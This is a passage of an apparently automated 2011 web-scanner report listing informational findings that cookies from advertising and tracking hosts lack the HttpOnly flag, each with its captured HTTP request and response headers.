Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ipinfo=2lpcr330zijasq5yhbqbe90httd3GK520752HF6QnyynflFbsgYnlreGrpuabybtvrfdfbsgynlre.pbz0; orblb=2lpscpz022ng10u01021mc27e10w0100000; vstcnt=41aj010r02458kv231p20420820pw30520820923sti11hj1042; clid=2lpcr3301171sbvs30c072oq0hnal00b68020x0980b; sglst=2040s0tolpl5u5098jj00968020x09809ag2lpuecb0001d00268020x028025colpscpz021np00368020x03803c1zlpuecb0001d00268020x02802; rdrlst=40n0g91lpuecb0000000268021196lpuecb00000002680213j3lpl5w50000000768021195lpuecb0000000268020camlpuecb0000000268020cjrlpuecb0000000268021194lpuecb00000002680200cclpuecb00000002680212pulpuecb00000002680210rdlpuecb0000000268020znmlpmzu30000000568021193lpuecb0000000268021ad8lpuecb0000000268021192lpuecb00000002680210tylpuecb000000026802196mlpmmkk0000000668020rbglpuecb00000002680215xylpl5u500000009680210polpl5vm00000008680212qnlpuecb00000002680210telpuecb0000000268020ciclpuecb0000000268020g8tlpscpz000000036802; acs=014020e0f0h1lpcr33xzt1flkuxzt18er2xzt1hnal

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="COM NAV INT STA NID OUR IND NOI"
Pragma: no-cache
Cache-Control: no-cache
Set-Cookie: orblb=2lpscpz022ng10u01021mc27e10w0100000; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: vstcnt=41aj010r02458kv231p20420820pw30520820923sti11hj1042; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: clid=2lpcr3301171sbvs30c072oq0mo4p00d6b020y0280d; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: sglst=2040s0tolpl5u50e9dn00b6b020y0280bag2lpuecb050vh0046b020y028045colpscpz072ht0056b020y02805c1zlpuecb050vh0046b020y02804; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Set-Cookie: rdrlst=40n0g91lpuecb000000046b021196lpuecb000000046b0213j3lpl5w5000000096b021195lpuecb000000046b020camlpuecb000000046b020cjrlpuecb000000046b021194lpuecb000000046b0200cclpuecb000000046b0212pulpuecb000000046b0210rdlpuecb000000046b020znmlpmzu3000000076b021193lpuecb000000046b021ad8lpuecb000000046b021192lpuecb000000046b0210tylpuecb000000046b02196mlpmmkk000000086b020rbglpuecb000000046b0215xylpl5u50000000b6b0210polpl5vm0000000a6b0212qnlpuecb000000046b0210telpuecb000000046b020ciclpuecb000000046b020g8tlpscpz000000056b02; Domain=media6degrees.com; Expires=Sat, 11-Feb-2012 18:26:16 GMT; Path=/
Content-Type: image/gif
Content-Length: 43
Date: Mon, 15 Aug 2011 18:26:15 GMT
Connection: close

GIF89a.............!.......,...........D..;

8.36. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTc2JnRsPTQzMjAw&piggybackCookie=uid:3574436734868397339 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; pubtime_25281=TMC; KRTBCOOKIE_58=1344-CM-00000001429329761; KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; KRTBCOOKIE_107=1471-uid:8413bde9-2099-43af-b214-8fee85ef2861; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699; _curtime=1313432705; pubfreq_25281=243-1; pubfreq_28134=243-1; PUBMDCID=1; pubfreq_25281_19972_333766901=661-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:41:28 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_16=226-uid:3574436734868397339; domain=pubmatic.com; expires=Wed, 14-Aug-2013 18:41:28 GMT; path=/
Set-Cookie: PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694.571_1408040699.76_1316025688; domain=pubmatic.com; expires=Thu, 14-Aug-2014 18:24:59 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.37. http://image2.pubmatic.com/AdServer/Pug  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://image2.pubmatic.com
Path:   /AdServer/Pug

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /AdServer/Pug?vcode=bz0yJnR5cGU9MSZjb2RlPTM2MiZ0bD00MzIwMA==&piggybackCookie=uid:4e394114-5150-5bce-73fa-628197421391 HTTP/1.1
Host: image2.pubmatic.com
Proxy-Connection: keep-alive
Referer: http://ads.pubmatic.com/AdServer/js/syncuppixels.html?p=25273&s=25281
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: KRTBCOOKIE_53=424-7a4bd699-aa86-4e32-8a1e-afa2b5ba13a0; KRTBCOOKIE_100=4065-v3y4gkoh99wrv; KRTBCOOKIE_133=1873-1sbvs30c072oq; KRTBCOOKIE_22=488-pcv:1|uid:3041410246858069995; KRTBCOOKIE_97=3385-uid:be7b476b-57fa-4267-a79e-a26d510d1377; KRTBCOOKIE_57=476-uid:3539656946931560696; KADUSERCOOKIE=125ABA9D-0FE2-43BB-ADE5-0E1A290F0CAF; pubfreq_28134=; pubtime_28134=TMC; KRTBCOOKIE_80=1336-1e4cb365-db7a-4e61-9b94-c144934e6ac1.10263.50185.199.34377.57407.; PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657; PUBMDCID=1; pubfreq_25281=; pubtime_25281=TMC; _curtime=1313432692; pubfreq_25281_19972_345442688=243-1; PMDTSHR=cat:; SYNCUPPIX_ON=YES; KTPCACOOKIE=YES

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:54 GMT
Server: Apache/2.2.4 (Unix) DAV/2 mod_fastcgi/2.4.2
Set-Cookie: KRTBCOOKIE_27=1216-uid:4e394114-5150-5bce-73fa-628197421391; domain=pubmatic.com; expires=Wed, 14-Aug-2013 18:24:54 GMT; path=/
Set-Cookie: PUBRETARGET=70_1314908322.2114_1327977180.1039_1315359433.82_1407443773.1928_1315859937.78_1408029196.390_1321202620.1588_1316024657.362_1316024694; domain=pubmatic.com; expires=Thu, 14-Aug-2014 15:13:16 GMT; path=/
Content-Length: 42
P3P: CP="NOI DSP COR LAW CUR ADMo DEVo TAIo PSAo PSDo IVAo IVDo HISo OTPo OUR SAMo BUS UNI COM NAV INT DEM CNT STA PRE LOC"
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Connection: close
Content-Type: image/gif

GIF89a.............!.......,...........D.;

8.38. http://js.revsci.net/gateway/gw.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://js.revsci.net
Path:   /gateway/gw.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /gateway/gw.js?csid=H07710 HTTP/1.1
Host: js.revsci.net
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NETID01=4bf7bb16cf9412c18b8815136d91a59c; NETSEGS_K05540=0a29f867077d7a4f&K05540&0&4e60db91&0&&4e3b97f9&eb0686832faccc361b6bf55e98e31ad5; udm_0=MLvv8iEJPj5npx6Bo8hY2L+1+kUjsrb3zCNeeLLD9My28XeHWAmn+9uUiLtJmK0Xf/l0O0X/1QEXLQALTg9EEFT6+LvS0M0lXglFWO58f0sfMpXzDxm+S1IZqOX1U27zHDsQW85DfkLDElQZxiHk4o/4bgBacphh6513iafXO0+djO48elokzpJEwV5p+VM10YTolQIdeL+PqwoN8MZoWogMtiF4P7nOuBORNXOsEBri4O2QxDrbbsjVF6gtLc4gzm9xZHIDy/5o0mrgHflrz9L8NaQJ4pud30h65IFxZktB8T/cL3blfVZCo4zCeHwhtw8o6ke3DX1rT5v1/vZLOePywRbs0Is9YP2k//uOqA2ekuS5StfAEgkTDys/Le/wxKKupbStXd9CiIDA8mj/W2sAl+xffMJtSZ3hkNYEyWe1hCmFxLHMtn+k48ida8E/Fp5sKtJm3wMuZ8LtP/FcpQHMgHKrrjXNCaYIydhGgPmHgyI4U0uKz9He6dCPtBC5h3yc4Lqg1ID+fNKAPWC9W141XK70cpkqVKwYLOFL+yU4GITEv43m/rvhy7mVcwCxfb8Astde+mbqQ5zkJJImBbsxcaAIRVAGor/txCaGoqqROl47NOD+gvwA0LXTifL+54l7gbstyQKGqCF90Iifqi2ndawl2G8AN3IFEd84cvPFrzUi99su/ymcPLS6aGnzrsd10bSd9ebjYqlQSWj9Ns9mBrYH7MqXsYvJXK6G8pSv1oRZ2lPNiSoQ1h0JTTeR3B01HAnlPID6Ig5zd6s7JKubRt/2w7Nb6kX1pcAeFjpk+0iL7szQ4Zd/JuPVOFvnq4SC77ziTWNMXwRPQLuOtEOCfCZzUf9BTkpfuM2fh/mWqRIvXTpxN+Lnw+xMbncDk3jQACrA; rsiPus_Mq_O="MLtPrM93sF9/IDFKT1Ygcyo+R7jFHbJwml9GW5geBHPr+wUITnpse6B5lWFJNAXVCUA2z+7FWZhAQVd6dFXIMjlKZdfb+YKvHMG9lK6M/tj+sUrbdzOSXNiidYeVFSXJGWrqvB4arfK8FH2r+PQoSgVZUPXYsJ2/PWutIm37r0LU6nMnOm2SQDpMvF3l"; rsi_us_1000000="pUP1Jk+j/xMUlj0GV1on/PIeTeZhl/ABIuE0WATIveE06i3f0/xPmLL3uOLZaEB2f2gDfDhI1d91v5puz+N+6b+yvAo7GmaZkTq4Gm/Rw7Ljd/ZFVxiCmfHFFWQyHdzyHv/gxecfTf0/SyR1+0VhDtz2BGcpw7DrM9CfG7dEUG+QQy48Tjo3f24UO/go/049JUZhb76OoyXf/6SsReISLRGVWABNu40UtI3M+cn6gvH8m7abUkKgNwpchhscue2RqqNDoORNIyedxSKdO2NOlKUAinGJIoTupBNQ+Mx5DmeNaeEo0C/I4Kv4rHf7JrR6RNw/NPeBTYR2xzi9Zvc3zfc6z0pTOxpRBzYH4LVtkyF693p6F/duCOSgZkFoF/znm+3H1Y20oOPl3hujZdVgHeaHqj58hOdBb05PleRPZZ36jDJIVm36L6xNl1FI8WeVpkg/gaI9e6dNRG23dHY8U9IY5mfsM8xmgluUCGMJJGcMdbbvccHZIfQ7W1mES+WSeFi1NtIJhqhmsTUdSkpZWOQmgOr7GWaFoTimBcYT5OO3XglWxJ1SFjhurKeAG4O/TiN3yIsta/QyhrTL8HSpL0VaSCXDxRpybSjGaR1Kz7ZbEVRh8qCZtEprm9HQ4/pHm1U35k48q7YXQzhc4Jz4pOrCG7otKe7T9nVU5WPO3R4fXKMJaywU"; rsi_segs_1000000=pUPDROROmfuIUoJyvOzCVgy/pjEkjhdzYx4wYfYjr0QZgJEHJs08tRf8WcUuLrQAFxcySqgqolNtLYIVF5M27L8vfsI7WByyXJ6gBlNTNwT8g7lTtVTtlUQIhMYnhGBxqxPi16ATScNUThNteKFr5insIjhhJfnz5/4MOhd/n6wiinE7/s0pX+4B2zcJ7hc=; rtc_GS70=MLuBa44HgVlDFVRDdcKRB3R3EIDZKgaJBK6woh4rAtJmVgX80yTcxtVUvX+wZdfT3z9ZvCMjShpnZzliZicNbn0rTj3r40ki4zC8bshHCjemRQboH1Al2GjhyihsVmLmviEIBiwmfPx4G76pEjpFI99ARJ8f4YFvwAdZJA==; NETSEGS_A09801=0a29f867077d7a4f&A09801&0&4e6e5333&0&&4e489fec&eb0686832faccc361b6bf55e98e31ad5

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: udm_0=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: udm_0=MLvvMlMJLipj3o8v6V8WYCIvc0VBcu/xuu9WfcVrMuPk8O7soFIKcYdQEN6uwgqX2sVezx87FOlyzEPmagY3Iz/VZ+NwxJRxWkhs5Jh7SyNGKNY/r8WDUWORsr6N+o32DlYaA2oRsZK5pcYmB9wgArNTAosm53fORrMHhNzg/3euxbOpmhb571ZQnpSGc6VnfKBN1f4G7BmiszCnRDhorxmZlHwil845mFj3srmarlE5TZGdrUPwNrgtf+wy4PgQFy0crjuwQYmpn+4PZnIDX+xIEWahVgYutgZHzYVr9ZhZk6gVqV3H+EJINFgIxTr5ZKJU6usEGhfURAjDnHRhtn0raxZdQFuMh6bxzA/4HkjFL9LcjZR4z3pkm+wtEYrulA8YD7Jqyz5Tw/LQrVqfpycODWX2yxFJPWzHqzh6VjCzUGVDq71Bkxtv/IJb9Fp/5osXWv/+k/P/iI3CEUjo6olnRkRk9YalHGVyNCcBO8AdJ9dnScC70nSjAhWSxRZmUylHP/+1fPZ2kTC773AG0D40F/aCZEfd/rqF5eBnSqT5qDrnpncHBGvgJYLRznm2rbkESA6WU6TL+xcmCm/2UxUveH5vbwOGVZWSaT49TJSa/dy+hMRc/2ZXPdExMEa8LgAmWGwpacgyLacAiLafVqwy9Kyogvh3Lp1zn5xCZRN/SO2bHBpMCxGgKgNLL8p6FNLIPykr2HhY6Ry53dzfwZ7ZdM1hSeiJOfWzIoN8KG2gP7m/e7UPGYy/j8fdmZuv8sAjmpuViz4EjNFS7UUykD25LOhmWvapfFzrcI13WsrLf4JahsSKvzo3eUHOcdIo76PjjTpFwm0/le4xyaaZ/hteERP+swToMxJi6VCD8qgCD6hpge6xHbp1xZrukTEuCz8dMY7q5pztWESpRIr4BD3fy/QsXRyVxm85ejXJq5cRZVxyiqnwaCzC9jC3P2uIJvM+saFoqJmrxyFZT3hgEUooAts+ANZt256xqEKsYW55ZSoejFJzMsK9; Domain=.revsci.net; Expires=Tue, 14-Aug-2012 18:45:33 GMT; Path=/
Last-Modified: Mon, 15 Aug 2011 18:45:33 GMT
Cache-Control: max-age=3600, private
Expires: Mon, 15 Aug 2011 19:45:33 GMT
X-Proc-ms: 1
Content-Type: application/javascript;charset=ISO-8859-1
Vary: Accept-Encoding
Date: Mon, 15 Aug 2011 18:45:32 GMT
Content-Length: 6200

//AG-develop 12.7.1-66 (2011-07-20 15:58:55 UTC)
var rsi_now= new Date();
var rsi_csid= 'H07710';if(typeof(csids)=="undefined"){var csids=[rsi_csid];}else{csids.push(rsi_csid);};function rsiClient(Da)
...[SNIP]...

8.39. http://markets.money.cnn.com/services/api/quotehover/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://markets.money.cnn.com
Path:   /services/api/quotehover/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /services/api/quotehover/?callback=tickerCallback&symb=NOK HTTP/1.1
Host: markets.money.cnn.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SelectedEdition=www; rsi_segs_ttn=A09801_10001|A09801_10313; adDEmas=R00&broadband&softlayer.com&0&usa&623&75207&44&26&U1&M2&77&; adDEon=true; s_ppv=36; rvisw=1; srvisw=new%3A1; rvism=1; srvism=new%3A1; s_cc=true; s_sq=%5B%5BB%5D%5D; s_vi=[CS]v1|2724B4AF051D06FF-6000013660068E87[CE]; __qseg=Q_D|Q_T|Q_441|Q_251|Q_233|Q_252|Q_240|Q_2902|Q_446|Q_292|Q_236|Q_579|Q_757|Q_242|Q_2836|Q_2835|Q_755|Q_577|Q_2901|Q_1758; __qca=P0-2040275928-1313434008975; __switchTo5x=38; __unam=7549672-131cec47d99-1e28128-1; rsi_segs=H07710_10515|H07710_10541|H07710_10343|H07710_10458|D08734_72639

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 15 Aug 2011 18:46:04 GMT
Content-Type: text/javascript; Charset=UTF-8
Connection: keep-alive
Vary: Accept-Encoding
Cache-Control: private
Expires: Mon, 15 Aug 2011 18:45:04 GMT
X-Powered-By: ASP.NET
P3P: CP="PHY ONL UNI PUR FIN COM NAV INT DEM STA HEA CUR ADM DEV OUR IND"
Set-Cookie: 2536%5F0=858FAD2AF56391E69137A9A30BAE1DB1; path=/
Set-Cookie: WSOD%5FxrefSymbol=NOK; expires=Tue, 16-Aug-2011 04:00:00 GMT; domain=cnn.com; path=/
Set-Cookie: WSOD%5FcompetitorChecks=; expires=Sat, 18-Aug-2001 04:00:00 GMT; domain=cnn.com; path=/
Set-Cookie: WSOD%5FcompareToSP500=0; expires=Tue, 16-Aug-2011 04:00:00 GMT; domain=cnn.com; path=/
Set-Cookie: WSOD%5FcompareToCategory=0; expires=Tue, 16-Aug-2011 04:00:00 GMT; domain=cnn.com; path=/
Content-Length: 765

tickerCallback({"Api":{"keys":{"outputFormat":"JSONP","generatedTime":"2:46pm ET, 08/15/2011","generatedTimeUTC":"1313433964000"},"dataType":"Stock","ticker":"NOK","exchange":"NYSE","companyName":"Nok
...[SNIP]...

8.40. http://medleyads.com/mad_history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /mad_history

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /mad_history?adgroups=3466 HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s5023=14252=1; group_history=2752=1; s1082=6308=2; s5022=9994=1; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1; __utmb=251326874.0.10.1313434615; __utmc=251326874; __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:50 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: __utmb=251326874.0.10.1313434615; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s1082=6308=2; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: __utmc=251326874; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s5023=14252=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: group_history=2752=1&3466=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s5022=9994=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: s5232=70975=1&24810=1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
Set-Cookie: __utma=251326874.488407081.1313434615.1313434615.1313434615.1; path=/; domain=.medleyads.com; expires=Tue, 14-Aug-2012 19:05:50 GMT
P3P: CP="DSP LAW"
X-ApacheServer: ii90-12.friendfinderinc.com
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..2.;

8.41. http://medleyads.com/spot_history  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://medleyads.com
Path:   /spot_history

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /spot_history?s=5232&a=70975&e=0 HTTP/1.1
Host: medleyads.com
Proxy-Connection: keep-alive
Referer: http://medleyads.com/spot/5232.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s5023=14252=1; group_history=2752=1; s1082=6308=2; s5022=9994=1; s5232=24810=1; __utma=251326874.488407081.1313434615.1313434615.1313434615.1; __utmb=251326874.0.10.1313434615; __utmc=251326874; __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 19:05:50 GMT
Server: Apache/2.2.3 (CentOS) mod_apreq2-20051231/2.6.1 mod_perl/2.0.4 Perl/v5.8.8
Set-Cookie: __utmb=251326874.0.10.1313434615; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s1082=6308=2; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: __utmc=251326874; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s5023=14252=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: __utmz=251326874.1313434615.1.1.utmcsr=xhamster.com|utmccn=(referral)|utmcmd=referral|utmcct=/; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: group_history=2752=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s5022=9994=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: s5232=70975=2&24810=1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
Set-Cookie: __utma=251326874.488407081.1313434615.1313434615.1313434615.1; path=/; domain=.medleyads.com; expires=Tue, 16-Aug-2011 19:05:50 GMT
P3P: CP="DSP LAW"
X-ApacheServer: ii53-20.friendfinderinc.com
Content-Type: image/gif
Content-Length: 42

GIF89a.............!.......,........@..2.;

8.42. http://phoenix.untd.com/TRCK/RGST  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://phoenix.untd.com
Path:   /TRCK/RGST

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /TRCK/RGST?AGMT=167&TIME=168&RNS=1827548113 HTTP/1.1
Host: phoenix.untd.com
Proxy-Connection: keep-alive
Referer: http://www.ask.com/display.html?cl=ca-aj-cat&ch=&ty=image%2Cflash&size=300x250&kw=&hints=&target=/5480.iac.usa.ask.hp.x.x.dir/;sz=300x250;log=0;s=as;hhi=159;test=0;ord=1313432642380?
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: WHRE=18DDF_1:125DC4_0_190AF|125D82_0_190AF|125DC3_0_190AD|125D81_0_190AC

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:24:14 GMT
nnCoection: close
Server: Phoenix/1.5.1
Content-Type: image/gif
Content-Length: 43
Set-Cookie: WHRE=18DF2_1:125D43_0_18E9A|125DC4_0_190AF|125D82_0_190AF|125DC3_0_190AD|125D81_0_190AC; expires=Thu, 12 Aug 2021 18:24:14 GMT; domain=.untd.com; path=/
P3P: policyref="http://cyclops.prod.untd.com/common/w3c/netzero.xml", CP="CAO DSP CURa ADMa DEVa TAIa PSAa PSDa OUR BUS IND PHY ONL UNI FIN COM NAV INT DEM PRE LOC"
Pragma: no-cache
Expires: Tue, 25 Apr 1995 09:30:27 -0700

GIF89a.............!.......,...........D..;

8.43. http://ping.crowdscience.com/ping.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ping.crowdscience.com
Path:   /ping.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ping.js?url=http%3A%2F%2Fmoney.cnn.com%2F2011%2F08%2F15%2Ftechnology%2Fgoogle_motorola%2Findex.htm%3Fhpt%3Dhp_t2&id=4c8235243e&u=mozilla%2F5.0%20(windows%20nt%206.1%3B%20wow64)%20applewebkit%2F535.1%20(khtml%2C%20like%20gecko)%20chrome%2F13.0.782.112%20safari%2F535.1&x=1313434020454&c=0&t=0&v=0&m=0&vn=2.0.4&nv=0&pv=0 HTTP/1.1
Host: ping.crowdscience.com
Proxy-Connection: keep-alive
Referer: http://money.cnn.com/2011/08/15/technology/google_motorola/index.htm?hpt=hp_t2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.112 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __csv=9532635152fbdebd

Response

HTTP/1.1 200 OK
Date: Mon, 15 Aug 2011 18:46:04 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7i mod_wsgi/2.7 Python/2.5.2
Set-Cookie: __csv=9532635152fbdebd; Domain=.crowdscience.com; expires=Sun, 13 Nov 2011 18:46:04; Path=/
Content-Length: 869
P3P: CP="NOI DSP COR NID DEVa PSAi OUR STP OTC",policyref="/w3c/p3p.xml"
Connection: close
Content-Type: text/plain

document.cookie = '__cst=c5b0255e4fc310b1;path=/';
document.cookie = '__csv=9532635152fbdebd|0;path=/;expires=' + new Date(new Date().getTime() + 7776000000).toGMTString();
if ('968b71d8793729f4'!='1'
...[SNIP]...

8.44. http://pix04.revsci.net/A09801/b3/0/3/1008211/65654042.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://pix04.revsci.net
Path:   /A09801/b3/0/3/1008211/65654042.js

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

